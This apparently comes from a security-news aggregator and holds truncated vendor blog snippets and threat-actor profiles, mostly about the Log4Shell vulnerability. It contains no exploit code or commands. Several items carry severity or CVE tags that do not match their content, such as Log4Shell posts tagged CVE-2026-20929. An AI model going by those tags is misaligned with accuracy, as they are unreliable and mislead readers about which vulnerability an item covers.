Dragos Has Observed Both the Attempted and Successful Exploitation of Log4j
Get the Complete Analysis
It has been six months since Log4j lit up security headlines. When the Alibaba Cloud Security team disclosed the Log4j vulnerability, it surprised many who never expected Apache’s Java logging library to be the source of a critical zero-day vulnerability.1 T
Crowdstrike
Common Vulnerabilities & Exposures (CVE)
blogs_crowdstrike
Common Vulnerabilities & Exposures (CVE)
Upcoming events
Conference
CrowdTour
Find a city near you
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Login
Experienced a breach?
Contact us
Businesses today are more at risk from cybersecurity attacks and data breaches than ever before. Data theft and ransomware attacks from vulnerabilities and exposures can cause millions of dollars in damages for corporations.
But what exactly are vulnerabilities and exposures? We can describe a vulnerability as a fault or weakness within a computer system or software that can grant unintended levels of access to a user . Vulnerabilities allow attackers to perform destructive actions on a computer system or network, such as installing malware or gaining unauthorized access to
Elastic
Detection Engineering — Elastic Security Labs
blogs_elastic
Detection Engineering — Elastic Security Labs
## Topic
## Detection Engineering
## 24 February 2026
## Beyond Behaviors: AI-Augmented Detection Engineering with ES|QL COMPLETION
Learn how Elastic's ES|QL COMPLETION command brings LLM reasoning directly into detection rules, enabling detection engineers to build intelligent alert triage without external orchestration.
## The Engineer's Guide to Elastic Detections as Code
This post details the latest evolution of Elastic Security's Detections as Code (DaC) framework, including its development timeline, current feature highlights, and tailored implementation examples.
## Investigating a Mysteriously Malformed Authenticode Signature
An in-depth investigation tracing a Windows Authenticode validation failure from vague error codes to undocumented kernel routines.
## Taking SHELLTE
Huntress
Critical RCE Vulnerability Updates (log4j - CVE-2021-44228) | Huntress
blogs_huntress·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical RCE Vulnerability Updates (log4j - CVE-2021-44228) | Huntress
Our team is investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others. Huntress is actively uncovering the effects of this vulnerability and will be frequently updating this page.
At this point, we have not identified an impact to The Huntress Security Platform, but our teams are diligently checking to ensure all instances of our back-end are safe and will be taking appropriate action as needed.
If your organization uses the log4j library, you should upgrade to log4j 2.17.1 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your
Greynoiseio
NoiseLetter March 2026
blogs_greynoiseio
NoiseLetter March 2026
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Threat Intel
Magic Hound (Magic Hound, TA453, COBALT ILLUSION)
threat_intel·CVSS 9.1
[CRITICAL] Magic Hound (Magic Hound, TA453, COBALT ILLUSION)
# Threat Actor Profile: Magic Hound
ATT&CK ID: G0059
Also known as: Magic Hound, TA453, COBALT ILLUSION, Charming Kitten, ITG18, Phosphorus, Newscaster, APT35, Mint Sandstorm
Suspected origin: Iran
## Overview
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Pr
Securelist
The Log4Shell Vulnerability – explained: how to stay secure
blogs_securelist·CVSS 10.0
CVE-2021-44228 [CRITICAL] The Log4Shell Vulnerability – explained: how to stay secure
Content menu
Close
Subscribe
# The Log4Shell Vulnerability – explained: how to stay secure
17 Dec 2021, 4:00pm (GMT+3)
via GoToWebinar
30 min
Presented by Marco Preuss, Marc Rivero, Dan Demeter
Register to Webinar
On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by maliciou
Crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
blogs_crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
Próximos eventos
Conferencia
CrowdTour
Encuentra la ciudad más cercana
Inicio de sesión
Tu cesta
Añadido a la cesta
Tu cesta está vacía
por endpoint / por año
al mes por endpoint
Inicio de sesión
¿Has sufrido una brecha de seguridad?
Contacto
a
c
d
e
f
g
h
i
k
l
m
n
o
p
q
r
s
t
u
v
w
x
Filter Category
La automatización de flujos de trabajo utiliza software para ejecutar tareas y procesos sin intervención humana.
La API en la sombra hace referencia a cualquier API implementada por los desarrolladores que no esté protegida, registrada ni monitorizada por el equipo de TI de la organización.
La automatización en la nube se encarga de tareas como aprovisionar servidores, gestionar cargas de trabajo y aplicar directivas de control de acceso.
La autenticació
Trendmicro
Cos'è la vulnerability Apache Log4J (Log4Shell)?
blogs_trendmicro
Cos'è la vulnerability Apache Log4J (Log4Shell)?
Collega la protezione dalle minacce e la gestione del rischio informatico
Scopri le soluzioni dei partner approvate da Trend per la nostra piattaforma leader
Il leader nella gestione dell'esposizione: trasformare la visibilità del rischio informatico in una sicurezza decisiva e proattiva
Blocca gli aggressori con una visibilità ineguagliabile, basata sull'intelligenza di XDR, Agentic SIEM e Agentic SOAR, che non lascia agli aggressori alcun posto dove nascondersi.
La piattaforma di sicurezza cloud più affidabile per sviluppatori, team di sicurezza e aziende
Estensione della visibilità al cloud e semplificazione delle indagini SOC
Semplifica la sicurezza delle applicazioni native per il cloud con scansione avanzata delle immagini dei container, controllo dell'accesso basato su criteri
Greynoiseio
Get the latest GreyNoise research on Confluence CVE-2022-26134
blogs_greynoiseio·CVSS 9.8
[CRITICAL] Get the latest GreyNoise research on Confluence CVE-2022-26134
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
Mass Exploitation Attacks: Is “Whack-A-Mole” Blocking a Viable Security Strategy?
blogs_greynoiseio
Mass Exploitation Attacks: Is “Whack-A-Mole” Blocking a Viable Security Strategy?
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Crowdstrike
What Is a Cyberattack?
blogs_crowdstrike
What Is a Cyberattack?
Upcoming events
Conference
CrowdTour
Find a city near you
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Contact us
## Cyberattack Definition
A cyberattack is an attempt by cybercriminals, hackers or other digital adversaries to access a computer network or system, usually for the purpose of altering, stealing, destroying or exposing information.
Cyberattacks can target a wide range of victims from individual users to enterprises or even governments. When targeting businesses or other organizations, the hacker’s goal is usually to access sensitive and valuable company resources, such as intellectual property (IP), customer data or payment details.
In recent years, cyberattacks have be
Trendmicro
Was ist die Apache Log4j/Log4Shell vulnerability?
blogs_trendmicro
Was ist die Apache Log4j/Log4Shell vulnerability?
Verbindet den Schutz vor Bedrohungen und das Management des Cyberrisikos
Spitzenreiter im Bereich Exposure Management – macht Cyberrisiken transparent und sorgt für entschlossene, proaktive Sicherheit
Stoppen Sie Angreifer mit unübertroffener Transparenz, unterstützt durch XDR, agentenbasiertes SIEM und SOAR – damit Angreifer sich nirgendwo mehr verstecken können
Nutzen Sie die bewährte Cloud-Sicherheitsplattform für Entwickler, Sicherheitsteams und Unternehmen.
Erweiterung der Transparenz auf die Cloud und Optimierung von SOC-Untersuchungen
Vereinfachen Sie die Sicherheit für Ihre Cloud-nativen Anwendungen durch erweitertes Container-Image-Scanning, richtlinienbasierte Zugriffssteuerung und Container-Laufzeitschutz.
Schützen Sie Anwendungsworkflows und Cloud-Speicher vor neuen und k
Huntress
Critical RCE Vulnerability: log4j - CVE-2021-44228 | Huntress
blogs_huntress·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical RCE Vulnerability: log4j - CVE-2021-44228 | Huntress
Our team is investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others. Huntress is actively uncovering the effects of this vulnerability and will be frequently updating this page.
At this point, we have not identified an impact to The Huntress Security Platform, but our teams are diligently checking to ensure all instances of our back-end are safe and will be taking appropriate action as needed.
If your organization uses the log4j library, you should upgrade to log4j 2.17.1 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your
Securelist
The Log4Shell Vulnerability – explained: how to stay secure
blogs_securelist·CVSS 10.0
[CRITICAL] The Log4Shell Vulnerability – explained: how to stay secure
Learn More
Learn More
Learn More
## Other solutions
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
## Other Industries
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
## Other Products
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
Learn More
## Other Services
Dark mode off
Securelist menu
Russian
Spanish
Brazil
Threats
Threats
APT (Targeted attacks)
Secure environment (IoT)
Mobile threats
Financial threats
Spam and phishing
Industrial threats
Web threats
Vulnerabilities and exploits
All threats
Categories
Categories
APT reports
Malware descriptions
Security Bulletin
Malware reports
Spam and phishing reports
Security technologies
Crowdstrike
What is the Log4j/Log4Shell Vulnerability
blogs_crowdstrike·CVSS 10.0
[CRITICAL] What is the Log4j/Log4Shell Vulnerability
Upcoming events
Conference
CrowdTour
Find a city near you
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Contact us
Log4j is a Java-based logging library maintained by the Apache Software Foundation. It’s used across countless enterprise applications, frameworks, and cloud services to log system events, debug messages, and application errors.
Its flexibility and ease of integration made it the default logging framework for many Java applications, and it was often bundled deep within software stacks via transitive dependencies. That ubiquity turned into a critical liability when a major security flaw was discovered in late 2021.
## What is Log4Shell?
Log4Shell is a critical zero-day vu
Crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
blogs_crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
Upcoming events
Conference
CrowdTour
Find a city near you
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Contact us
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
z
Filter Category
Application resiliency refers to the tools and principles that ensure critical systems remain functional despite disruptions.
AIDR secures the full AI‑native attack surface and bridges the gap between enterprises operations and how adversaries attack.
AI anomaly detection employs the use of AI/ML algorithms and models to identify unusual behaviors, events, or patterns that diverge from normal or expected baselines and is crucial for maintaining the integrity of critical information a
Recorded Future
2021 Vulnerability Landscape
blogs_recorded_future·CVSS 10.0
[CRITICAL] 2021 Vulnerability Landscape
# 2021 Vulnerability Landscape
Editor’s Note: The following post is an excerpt of a full report. To read the entire analysis, click here to download the report as a PDF.
The annual vulnerability report surveys the threat landscape of 2021, summarizing a year of intelligence produced by Recorded Future’s threat research team, Insikt Group. It draws from data on the Recorded Future® Platform, including open sources like media outlets and publicly available research from other security groups, as well as closed sources on the criminal underground, to analyze global trends and evaluate the top 10 most significant vulnerability disclosures from 2021. The report will be of interest to anyone seeking a broad, holistic view of the cyber vulnerability threat landscape in 2021.
#### Executive Sum
Crowdstrike
How CrowdStrike Protects Customers from Log4Shell Threats
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] How CrowdStrike Protects Customers from Log4Shell Threats
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
Recorded Future
2021 Vulnerability Landscape
blogs_recorded_future·CVSS 10.0
[CRITICAL] 2021 Vulnerability Landscape
## 2021 Vulnerability Landscape
The annual vulnerability report surveys the threat landscape of 2021, summarizing a year of intelligence produced by Recorded Future’s threat research team, Insikt Group. It draws from data on the Recorded Future® Platform, including open sources like media outlets and publicly available research from other security groups, as well as closed sources on the criminal underground, to analyze global trends and evaluate the top 10 most significant vulnerability disclosures from 2021. The report will be of interest to anyone seeking a broad, holistic view of the cyber vulnerability threat landscape in 2021.
## Executive Summary
The 2021 vulnerability threat landscape was defined by high-profile incidents involving integral vendor software that led to widespread
Trendmicro
What Is Apache Log4J (Log4Shell) Vulnerability?
blogs_trendmicro
What Is Apache Log4J (Log4Shell) Vulnerability?
Bridge threat protection and cyber risk management
Browse Trend-approved partner solutions for our leading platform
Your environment, your choice – deploy Trend Vision One™ as SaaS or customer hosted
The leader in Exposure Management – turning cyber risk visibility into decisive, proactive security
Stop adversaries with unrivaled visibility, powered by the intelligence of XDR, Agentic SIEM, and Agentic SOAR to leave attackers with nowhere left to hide
The most trusted cloud security platform for developers, security teams, and businesses
Extend visibility to the cloud and streamline SOC investigations
Secure your data center, cloud, and containers without compromising performance by leveraging a cloud security platform with CNAPP capabilities
Simplify security for your cloud-native
Huntress
VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress
blogs_huntress
VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress
On January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges). According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.
Our team is continuing to track this activity and this post will be updated with new information as it becomes available.
Image Source: NHS - https://digital.nhs.uk/cyber-alerts/2022/cc-4002
Based on Huntress’ dataset of 180 Horizon servers, we’ve validated NHS’ intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js w
Trendmicro
¿Qué es la vulnerabilidad de Apache Log4J (Log4Shell)?
blogs_trendmicro
¿Qué es la vulnerabilidad de Apache Log4J (Log4Shell)?
Elimine la separación entre la protección frente a amenazas y la gestión del riesgo cibernético
El líder en gestión de exposiciones: convirtiendo la visibilidad de los ciberriesgos en una seguridad proactiva y decisiva
Detenga a los adversarios con una visibilidad sin igual, impulsada por la inteligencia de XDR, SIEM agente y SOAR agente para dejar a los atacantes en ningún lugar
La plataforma de seguridad en la nube más fiable para desarrolladores, equipos de seguridad y empresas
Amplíe la visibilidad de la nube y optimice las investigaciones del SOC
Simplifique la seguridad de sus aplicaciones nativas en la nube con un avanzado análisis de imágenes de contenedor, control de admisión con base en política y protección de tiempo de ejecución del contenedor
Proteja el flujo de trabajo
Recorded Future
Log4Shell: How It’s Exploited and Mitigating Damage
blogs_recorded_future·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell: How It’s Exploited and Mitigating Damage
## Log4Shell: How It’s Being Exploited and How to Mitigate Damage
CVE-2021-44228 is a critical vulnerability affecting Log4j, a widely used, open-source logging library written in Java. The vulnerability in Log4j will parse a specially crafted log message insecurely, causing it to execute remote code with the full privileges of the main program. The exploit has been dubbed Log4Shell.
On December 9, 2021, Chen Zhaojun of the Alibaba Cloud Security Team discovered and released sample code for a major remote code execution vulnerability in Apache's Log4j technology. In a now-deleted social media post, Zhaojun shared a proof of concept (POC) for the Log4j vulnerability. Initially, the vulnerability was thought to be limited to Minecraft, where it was used by trolls to take over the game’s se
Greynoiseio
The Twelfth Day Of Tagsmas (2023): Unauthenticated Remote Code Execution (RCE) In Log4j (CVE-2021-44228)
blogs_greynoiseio·CVSS 10.0
[CRITICAL] The Twelfth Day Of Tagsmas (2023): Unauthenticated Remote Code Execution (RCE) In Log4j (CVE-2021-44228)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Huntress
What Is Remote Code Execution (RCE)? How to Prevent It | Huntress
blogs_huntress
What Is Remote Code Execution (RCE)? How to Prevent It | Huntress
Remote code execution, or RCE, might sound like yet another technical term from cybersecurity's alphabet soup. But in reality, RCE is a dangerous vulnerability that can allow cyber attackers to take over computers, servers, or even entire networks, with results ranging from theft to total shutdown. If you own, use, or manage devices that connect to the internet, understanding RCE isn’t just helpful. It’s essential.
This guide lays out exactly what remote code execution is, how attackers use RCE, and which practical steps you can take to protect your systems. You’ll also find frequently asked questions and real-life RCE attack examples that will help you recognize this threat and respond confidently.
## Key takeaways
RCE gives attackers complete control: Remote code execution vulnerabili
Crowdstrike
Common Vulnerabilities & Exposures (CVE)
blogs_crowdstrike
Common Vulnerabilities & Exposures (CVE)
Upcoming events
Conference
CrowdTour
Find a city near you
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Contact us
Businesses today are more at risk from cybersecurity attacks and data breaches than ever before. Data theft and ransomware attacks from vulnerabilities and exposures can cause millions of dollars in damages for corporations.
But what exactly are vulnerabilities and exposures? We can describe a vulnerability as a fault or weakness within a computer system or software that can grant unintended levels of access to a user . Vulnerabilities allow attackers to perform destructive actions on a computer system or network, such as installing malware or gaining unauthorized access to
Huntress
CVE-2021-44228: Log4Shell (Apache Log4j RCE) Vulnerability | Huntress
blogs_huntress·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228: Log4Shell (Apache Log4j RCE) Vulnerability | Huntress
## CVE-2021-44228 Vulnerability
Written by: Monica Burgess
Published date: 11/07/2025
## What is CVE-2021-44228 Vulnerability?
A critical remote code execution (RCE) vulnerability in Apache Log4j 2, a popular Java logging library. Nicknamed Log4Shell, it allows an attacker to execute arbitrary code on a server by sending a specially crafted log message. It’s one of the most severe vulnerabilities ever discovered, earning a CVSS score of 10.0 out of 10.0.
## When was it Discovered?
The CVE-2021-44228 vulnerability was publicly disclosed on December 9, 2021. It was originally discovered by Chen Zhaojun of Alibaba Cloud Security Team and reported to Apache on November 24, 2021. The public release triggered a massive, worldwide scramble as organizations rushed to understand their exposur
Greynoiseio
Trending: Apache Log4j Vulnerability
blogs_greynoiseio·CVSS 10.0
[CRITICAL] Trending: Apache Log4j Vulnerability
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
blogs_crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
Upcoming events
Conference
CrowdTour
Find a city near you
Summit
Day Zero 2026
Las Vegas, NV
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
z
Filter Category
Application resiliency refers to the tools and principles that ensure critical systems remain functional despite disruptions.
AIDR secures the full AI‑native attack surface and bridges the gap between enterprises operations and how adversaries attack.
AI anomaly detection employs the use of AI/ML algorithms and models to identify unusual behaviors, events, or patterns that diverge from normal or expected baselin
Huntress
CVE-2021-45046 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 10.0
CVE-2021-45046 [CRITICAL] CVE-2021-45046 Vulnerability: Analysis, Impact, Mitigation | Huntress
CVE-2021-45046 Vulnerability
Published: 2/20/2025
Written by: Lizzie Danielson
## What is CVE-2021-45046 vulnerability?
CVE-2021-45046 is a Remote Code Execution (RCE) vulnerability connected to the widely-used Apache Log4j logging library, which allows attackers to manipulate logging data. Initially perceived as a denial-of-service risk, it was later revealed to enable attackers to execute arbitrary code in certain non-default configurations, making it highly critical.
## When was it discovered?
CVE-2021-45046 was disclosed on December 14, 2021, following the initial CVE-2021-44228 ("Log4Shell") vulnerability. The flaw was identified during the response to the first issue, with contributions from Apache maintainers and security researchers.
## Affected products & versions
Product
Elastic
Detection Engineering — Elastic Security Labs
blogs_elastic
Detection Engineering — Elastic Security Labs
#### Topic
# Detection Engineering
Subscribe
#### 24 February 2026
## Beyond Behaviors: AI-Augmented Detection Engineering with ES|QL COMPLETION
Learn how Elastic's ES|QL COMPLETION command brings LLM reasoning directly into detection rules, enabling detection engineers to build intelligent alert triage without external orchestration.
4 February 2026The Engineer's Guide to Elastic Detections as CodeThis post details the latest evolution of Elastic Security's Detections as Code (DaC) framework, including its development timeline, current feature highlights, and tailored implementation examples.4 September 2025Investigating a Mysteriously Malformed Authenticode SignatureAn in-depth investigation tracing a Windows Authenticode validation failure from vague error codes to undocumented ke
Trendmicro
What Is Apache Log4J (Log4Shell) Vulnerability?
blogs_trendmicro
What Is Apache Log4J (Log4Shell) Vulnerability?
Bridge threat protection and cyber risk management
Browse Trend-approved partner solutions for our leading platform
Your environment, your choice – deploy Trend Vision One™ as SaaS or customer hosted
The leader in Exposure Management – turning cyber risk visibility into decisive, proactive security
Stop adversaries with unrivaled visibility, powered by the intelligence of XDR, Agentic SIEM, and Agentic SOAR to leave attackers with nowhere left to hide
The most trusted cloud security platform for developers, security teams, and businesses
Extend visibility to the cloud and streamline SOC investigations
Secure your data center, cloud, and containers without compromising performance by leveraging a cloud security platform with CNAPP capabilities
Simplify security for your cloud-native
Crowdstrike
How CrowdStrike Protects Customers from Log4Shell Threats
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] How CrowdStrike Protects Customers from Log4Shell Threats
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Greynoiseio
Malicious Tag Roundup (January 2022)
blogs_greynoiseio
Malicious Tag Roundup (January 2022)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Crowdstrike
Hypervisor Jackpotting, Part 3: Lack of Antivirus Support Opens the Door to Adversaries
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Hypervisor Jackpotting, Part 3: Lack of Antivirus Support Opens the Door to Adversaries
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Huntress
Ten Years of Resilience, Innovation & Community-Driven Defense | Huntress
blogs_huntress·CVSS 8.8
[HIGH] Ten Years of Resilience, Innovation & Community-Driven Defense | Huntress
The world of cybersecurity has been a wild ride over the last decade. As attackers stepped up their game year over year, the security community responded and adapted with resilience and ingenuity to each new wave of threats.
Attackers tested our limits time and time again with bolder, more cutting-edge cyberattacks: ransomware, supply chain compromises, zero-day vulnerabilities, and more. But every single breach, compromise, and exploited vulnerability taught us something new, pushed us harder to innovate and stay steps ahead, brought our security community closer together, and rallied us to wreck hackers.
As we celebrate our 10th anniversary at Huntress this month, we’re pausing to look back at the events that have shaped the entire cybersecurity community. Understanding where we've bee
Threat Intel
Sea Turtle (Sea Turtle, Teal Kurma, Marbled Dust)
threat_intel
Sea Turtle (Sea Turtle, Teal Kurma, Marbled Dust)
# Threat Actor Profile: Sea Turtle
ATT&CK ID: G1041
Also known as: Sea Turtle, Teal Kurma, Marbled Dust, Cosmic Wolf, SILICON
## Overview
Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
## Techniques (TTPs)
### Resource Development
- T1583 A
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Crowdstrike
Qué es la vulnerabilidad Log4j/Log4Shell
blogs_crowdstrike·CVSS 10.0
[CRITICAL] Qué es la vulnerabilidad Log4j/Log4Shell
Próximos eventos
Conferencia
CrowdTour
Encuentra la ciudad más cercana
Inicio de sesión
Tu cesta
Añadido a la cesta
Tu cesta está vacía
por endpoint / por año
al mes por endpoint
Inicio de sesión
¿Has sufrido una brecha de seguridad?
Contacto
Log4j es una biblioteca de registro basada en Java cuyo mantenimiento corre a cargo de la Apache Software Foundation. Se utiliza en innumerables aplicaciones empresariales, frameworks y servicios en la nube para los log de eventos del sistema, los mensajes de depuración y los errores de aplicaciones.
Su flexibilidad y facilidad de integración la han convertido en el marco de registro predeterminado para muchas aplicaciones Java, y a menudo se incluía en las pilas de software a través de dependencias transitivas. Esa ubicuidad se convirti
Crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
blogs_crowdstrike
Cybersecurity 101: Fundamentals of Cybersecurity Topics
Upcoming events
Conference
CrowdTour
Find a city near you
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Login
Experienced a breach?
Contact us
a
b
c
d
